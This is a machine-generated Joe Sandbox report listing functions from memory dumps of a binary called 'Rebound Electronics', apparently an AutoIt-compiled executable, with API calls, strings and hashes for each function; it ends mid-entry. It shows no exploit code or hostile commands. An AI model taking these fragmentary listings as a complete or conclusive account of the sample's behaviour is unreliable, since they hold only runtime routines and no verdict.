Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 55f6e1724782afc75a66f8aa5f3760a5b4f0f267d8ab3475a11901f97675f160
Instruction ID: 0b7499d393c44d87e69efad8b0c98e5291b058fc33b9f617aa92ebf4a6e6b321
Opcode Fuzzy Hash: 55f6e1724782afc75a66f8aa5f3760a5b4f0f267d8ab3475a11901f97675f160
Instruction Fuzzy Hash: 3D519030B48342ABC620EF15D8C2D29B7A0FB94704B24492BF5579B391DB71DA45EB53

Function 00C2CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C2CC68
__wcsnicmp.LIBCMT ref: 00C2CC80
__wcsnicmp.LIBCMT ref: 00C2CC98
__wcsnicmp.LIBCMT ref: 00C2CCB0
__wcsnicmp.LIBCMT ref: 00C2CCC8
__wcsnicmp.LIBCMT ref: 00C2CCE0
__wcsnicmp.LIBCMT ref: 00C2CCF8
__wcsnicmp.LIBCMT ref: 00C2CD0C
__wcsnicmp.LIBCMT ref: 00C2CD4D
__wcsnicmp.LIBCMT ref: 00C2CD61
__wcsnicmp.LIBCMT ref: 00C2CD75
__wcsnicmp.LIBCMT ref: 00C2CD89

Strings

#ce, xrefs: 00C2CD83
#cs, xrefs: 00C2CD06, 00C2CD5B
#include-once, xrefs: 00C2CCC2
#comments-start, xrefs: 00C2CCF2, 00C2CD47
#OnAutoItStartRegister, xrefs: 00C2CCAA
#notrayicon, xrefs: 00C2CC7A
Cannot parse #include, xrefs: 00C92FA1
#comments-end, xrefs: 00C2CD6F
#pragma compile, xrefs: 00C2CC62
Unterminated group of comments, xrefs: 00C92FB4
Bad directive syntax error, xrefs: 00C92ECB
#include, xrefs: 00C2CCDA
#requireadmin, xrefs: 00C2CC92

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: b0b49b68515525b207b39df7c78f1a3c154ab923e9d63215816cca82cfdc1f51
Instruction ID: ec62d76574ec558bc1ea545ffa9a83f9380e5ee0ffe53b02a1da604717a7d6ca
Opcode Fuzzy Hash: b0b49b68515525b207b39df7c78f1a3c154ab923e9d63215816cca82cfdc1f51
Instruction Fuzzy Hash: 8C811A31640225BBCF25AF64ECC2FBF7768AF54700F044039FD46AA5C2EB61DA45D2A5

Function 00C8638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00CBDC00), ref: 00C86449

Strings

SELECTSTRING, xrefs: 00C86626
ISVISIBLE, xrefs: 00C86455
EDITPASTE, xrefs: 00C8675B
TABRIGHT, xrefs: 00C864BD
UNCHECK, xrefs: 00C866A1
CHECK, xrefs: 00C8668B
TABLEFT, xrefs: 00C864A7
GETCURRENTSELECTION, xrefs: 00C86603
DELSTRING, xrefs: 00C86569
ADDSTRING, xrefs: 00C86536
FINDSTRING, xrefs: 00C86596
ISENABLED, xrefs: 00C8648C
GETLINECOUNT, xrefs: 00C866E4
SETCURRENTSELECTION, xrefs: 00C865D6
CURRENTTAB, xrefs: 00C864DD
GETCURRENTLINE, xrefs: 00C86704
SENDCOMMANDID, xrefs: 00C867CA
GETCURRENTCOL, xrefs: 00C86724
HIDEDROPDOWN, xrefs: 00C86520
SHOWDROPDOWN, xrefs: 00C86500
GETSELECTED, xrefs: 00C866C1
ISCHECKED, xrefs: 00C86659
GETLINE, xrefs: 00C8678B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: e1228bb56518bbcd31519cade3fcef2541c2ccdb7921ce92365f7ce500071084
Instruction ID: bad52dd6f8c54b518ae35a05df78a9e9c9c979089f0968ceab6accde2ce14254
Opcode Fuzzy Hash: e1228bb56518bbcd31519cade3fcef2541c2ccdb7921ce92365f7ce500071084
Instruction Fuzzy Hash: 62C194742043458BCF04FF10D551A6E77A5AF94348F04486DF9966B3E2DB30EE4AEB8A

Function 00C8D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C8D5AE
SetTextColor.GDI32(?,?), ref: 00C8D5B2
GetSysColorBrush.USER32(0000000F), ref: 00C8D5C8
GetSysColor.USER32(0000000F), ref: 00C8D5D3
CreateSolidBrush.GDI32(?), ref: 00C8D5D8
GetSysColor.USER32(00000011), ref: 00C8D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C8D5FE
SelectObject.GDI32(?,00000000), ref: 00C8D60F
SetBkColor.GDI32(?,00000000), ref: 00C8D618
SelectObject.GDI32(?,?), ref: 00C8D625
InflateRect.USER32(?,000000FF,000000FF), ref: 00C8D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C8D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 00C8D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C8D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 00C8D6DD
DrawFocusRect.USER32(?,?), ref: 00C8D6E8
GetSysColor.USER32(00000011), ref: 00C8D6F6
SetTextColor.GDI32(?,00000000), ref: 00C8D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C8D712
SelectObject.GDI32(?,00C8D2A5), ref: 00C8D729
DeleteObject.GDI32(?), ref: 00C8D734
SelectObject.GDI32(?,?), ref: 00C8D73A
DeleteObject.GDI32(?), ref: 00C8D73F
SetTextColor.GDI32(?,?), ref: 00C8D745
SetBkColor.GDI32(?,?), ref: 00C8D74F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 3d3bd92dd9140251f129710a5063a7194a973badc7b4284f2b2b6086ed086c5d
Instruction ID: b4ca3d88e2fbb775f6dcf7fbb06e319777e5f3251cccb44643f12ef8796d51af
Opcode Fuzzy Hash: 3d3bd92dd9140251f129710a5063a7194a973badc7b4284f2b2b6086ed086c5d
Instruction Fuzzy Hash: F8512CB1900218BFDB10AFA4DC48FAE7B79EB09328F104515FA27AB2E1D7759A40DF50

Function 00C8B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C8B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C8B7C1
CharNextW.USER32(0000014E), ref: 00C8B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C8B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C8B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C8B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C8B875
SetWindowTextW.USER32(?,0000014E), ref: 00C8B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C8B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C8B90E
_memset.LIBCMT ref: 00C8B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C8B97C
_memset.LIBCMT ref: 00C8B9DB
SendMessageW.USER32 ref: 00C8BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C8BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 00C8BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 00C8BB2C
GetMenuItemInfoW.USER32(?), ref: 00C8BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C8BBA3
DrawMenuBar.USER32(?), ref: 00C8BBB2
SetWindowTextW.USER32(?,0000014E), ref: 00C8BBDA

Strings

0, xrefs: 00C8BB4F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 3d1d2916561bfa2aaf701dc9a3ec11a20b31cc16e22c8aac6b14eaf5d3f9f0ac
Instruction ID: c8beafbf3e953fc5f9cbff5587f9a77419ff493378670b3260b4ea377b95e5df
Opcode Fuzzy Hash: 3d1d2916561bfa2aaf701dc9a3ec11a20b31cc16e22c8aac6b14eaf5d3f9f0ac
Instruction Fuzzy Hash: 4FE17D71900219ABDF20AF65CC84BEE7BB8FF05718F148156F92AAB290D7709E41DF64

Function 00C8764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C8778A
GetDesktopWindow.USER32 ref: 00C8779F
GetWindowRect.USER32(00000000), ref: 00C877A6
GetWindowLongW.USER32(?,000000F0), ref: 00C87808
DestroyWindow.USER32(?), ref: 00C87834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C8785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C878A1
SendMessageW.USER32(?,00000421,?,?), ref: 00C878B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C878C9
IsWindowVisible.USER32(?), ref: 00C878E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C87904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C87918
GetWindowRect.USER32(?,?), ref: 00C87930
MonitorFromPoint.USER32(?,?,00000002), ref: 00C87956
GetMonitorInfoW.USER32 ref: 00C87970
CopyRect.USER32(?,?), ref: 00C87987
SendMessageW.USER32(?,00000412,00000000), ref: 00C879F2

Strings

tooltips_class32, xrefs: 00C87856
0, xrefs: 00C87735
(, xrefs: 00C87965

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8bdcc7b8d96d972ed26e0c39d408a643cecc9d65d1461b71a40ea58f804b13ec
Instruction ID: 6cd1b52ff13b779b5c638ca735c7a8c14c9dc1c1b7f905e25b68681c9e1685f3
Opcode Fuzzy Hash: 8bdcc7b8d96d972ed26e0c39d408a643cecc9d65d1461b71a40ea58f804b13ec
Instruction Fuzzy Hash: 3BB19E71608311AFDB04EF64C948B5EBBE4FF88314F108A1DF59A9B291E770E905CB96

Function 00C3A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C3A939
GetSystemMetrics.USER32(00000007), ref: 00C3A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C3A96C
GetSystemMetrics.USER32(00000008), ref: 00C3A974
GetSystemMetrics.USER32(00000004), ref: 00C3A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C3A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00C3A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C3A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C3AA0D
GetClientRect.USER32(00000000,000000FF), ref: 00C3AA2B
GetStockObject.GDI32(00000011), ref: 00C3AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3AA52

Part of subcall function 00C3B63C: GetCursorPos.USER32(000000FF), ref: 00C3B64F
Part of subcall function 00C3B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00C3B66C
Part of subcall function 00C3B63C: GetAsyncKeyState.USER32(00000001), ref: 00C3B691
Part of subcall function 00C3B63C: GetAsyncKeyState.USER32(00000002), ref: 00C3B69F

SetTimer.USER32(00000000,00000000,00000028,00C3AB87), ref: 00C3AA79

Strings

AutoIt v3 GUI, xrefs: 00C3A9F1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: baedbcf5b8c3c003266466c5b70863d5dfa7409997d4e2d7e0e71ac1136a8d0f
Instruction ID: 965dad7f72edcea52fe487e36aa4e8d974f968f696ca1b6f82ba6a252cc057d8
Opcode Fuzzy Hash: baedbcf5b8c3c003266466c5b70863d5dfa7409997d4e2d7e0e71ac1136a8d0f
Instruction Fuzzy Hash: F1B17D71A0020AAFDF14DFA8DC89BED7BB8FB08314F154219FA56A7290DB34D960DB51

Function 00C22EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C22F7A
IsWindow.USER32(?), ref: 00C922FD

Strings

CLASS, xrefs: 00C92128
LAST, xrefs: 00C920B6
TITLE, xrefs: 00C92292
INSTANCE, xrefs: 00C9223C
REGEXPCLASS, xrefs: 00C92149
ACTIVE, xrefs: 00C920CC
ALL, xrefs: 00C92264
HANDLE, xrefs: 00C920E2
REGEXPTITLE, xrefs: 00C920F8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 6cfff7e3ebc77b24b1f8507118a82181788ba5b867b609604ec37782875cd820
Instruction ID: c80d9eb94b7725b121bc56b2ec2ccf78db8c4cdae30136fd134b518bbcfedd22
Opcode Fuzzy Hash: 6cfff7e3ebc77b24b1f8507118a82181788ba5b867b609604ec37782875cd820
Instruction Fuzzy Hash: F4D1E830104742BBCF04EF50D485AAEBBB4FF54354F104A1DF4A6639A1DB30EA9AEB91

Function 00C83639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C83735
RegCreateKeyExW.ADVAPI32(?,?,00000000,00CBDC00,00000000,?,00000000,?,?), ref: 00C837A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C837EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C83874
RegCloseKey.ADVAPI32(?), ref: 00C83B94
RegCloseKey.ADVAPI32(00000000), ref: 00C83BA1

Strings

REG_MULTI_SZ, xrefs: 00C8395C
REG_BINARY, xrefs: 00C83B2F
REG_QWORD, xrefs: 00C83AE2
REG_SZ, xrefs: 00C838B2
REG_DWORD, xrefs: 00C83A65
REG_EXPAND_SZ, xrefs: 00C83811

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c8d9cd23a92a8a01ed97272a489fe72421019c7cb24766f0191eb2caeb937442
Instruction ID: 26457f42c0c083979916dfce202a083f23ca3e2f18220e387f429eaee3c9fb43
Opcode Fuzzy Hash: c8d9cd23a92a8a01ed97272a489fe72421019c7cb24766f0191eb2caeb937442
Instruction Fuzzy Hash: 0C0269752006119FCB14EF24D895A2EB7E5FF88724F04845DF99A9B3A1CB30EE01DB89

Function 00C86BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C86C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C86D16

Strings

FINDITEM, xrefs: 00C86E81
SELECTINVERT, xrefs: 00C86DDE
GETTEXT, xrefs: 00C86CBF
GETSELECTEDCOUNT, xrefs: 00C86CF9
ISSELECTED, xrefs: 00C86D21
SELECTALL, xrefs: 00C86D75
GETITEMCOUNT, xrefs: 00C86C84
VIEWCHANGE, xrefs: 00C86ECD
DESELECT, xrefs: 00C86DFC
SELECT, xrefs: 00C86DA8
GETSELECTED, xrefs: 00C86E3C
GETSUBITEMCOUNT, xrefs: 00C86CA1
SELECTCLEAR, xrefs: 00C86D8D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 1af6ac9ec1aabb081026167cbd251527fd2be96eb5a1fa8434cf1bfb07c62c44
Instruction ID: df25581231aac9e8e306899ddbcae110f98c259e5324b059b8a84c729a52a815
Opcode Fuzzy Hash: 1af6ac9ec1aabb081026167cbd251527fd2be96eb5a1fa8434cf1bfb07c62c44
Instruction Fuzzy Hash: EEA18D302143419FCB18FF20D891A6EB3A5BF54318F10496DB9A6AB7D2DB30ED0ADB55

Function 00C5CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C5CF91
__swprintf.LIBCMT ref: 00C5D032
_wcscmp.LIBCMT ref: 00C5D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C5D09A
_wcscmp.LIBCMT ref: 00C5D0D6
GetClassNameW.USER32(?,?,00000400), ref: 00C5D10D
GetDlgCtrlID.USER32(?), ref: 00C5D15F
GetWindowRect.USER32(?,?), ref: 00C5D195
GetParent.USER32(?), ref: 00C5D1B3
ScreenToClient.USER32(00000000), ref: 00C5D1BA
GetClassNameW.USER32(?,?,00000100), ref: 00C5D234
_wcscmp.LIBCMT ref: 00C5D248
GetWindowTextW.USER32(?,?,00000400), ref: 00C5D26E
_wcscmp.LIBCMT ref: 00C5D282

Strings

%s%u, xrefs: 00C5D02C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 99abd95bcf6ef49ebc5fbeffa73f145dc6fa4997bf3f8b6d216e0f5243b67bac
Instruction ID: f6662ee975a0000470fd73d4ec0ba9d3d8279d2ed34a3b6b5147021fe1d4eb0c
Opcode Fuzzy Hash: 99abd95bcf6ef49ebc5fbeffa73f145dc6fa4997bf3f8b6d216e0f5243b67bac
Instruction Fuzzy Hash: C7A1B075604702AFD724DF64C884BAAB7A8FF44355F004619FDAAD3190DB30EE89CB95

Function 00C5D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C5D8EB
_wcscmp.LIBCMT ref: 00C5D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C5D924
CharUpperBuffW.USER32(?,00000000), ref: 00C5D941
_wcscmp.LIBCMT ref: 00C5D95F
_wcsstr.LIBCMT ref: 00C5D970
GetClassNameW.USER32(00000018,?,00000400), ref: 00C5D9A8
_wcscmp.LIBCMT ref: 00C5D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C5D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 00C5DA28
_wcscmp.LIBCMT ref: 00C5DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 00C5DA60
GetWindowRect.USER32(00000004,?), ref: 00C5DAC9

Strings

ThumbnailClass, xrefs: 00C5D9B3, 00C5DA33
@, xrefs: 00C5D8C6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 606c901d3adfaecc22be0517021eae255ea4f152f198ddb8eb0195fe1f38d292
Instruction ID: 7a1cae645d723834d04e2d695e83376bebb28c318da15ea3fb514beb5dbaf1b4
Opcode Fuzzy Hash: 606c901d3adfaecc22be0517021eae255ea4f152f198ddb8eb0195fe1f38d292
Instruction Fuzzy Hash: 9C81C4350083059BDB25DF10C885FAA7BE8FF84315F04446AFD9B9A096DB30DE89DBA5

Function 00C5D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C5D753

Strings

CLASSNAME=, xrefs: 00C5D790
LAST, xrefs: 00C5D718
[ALL, xrefs: 00C5D7F9
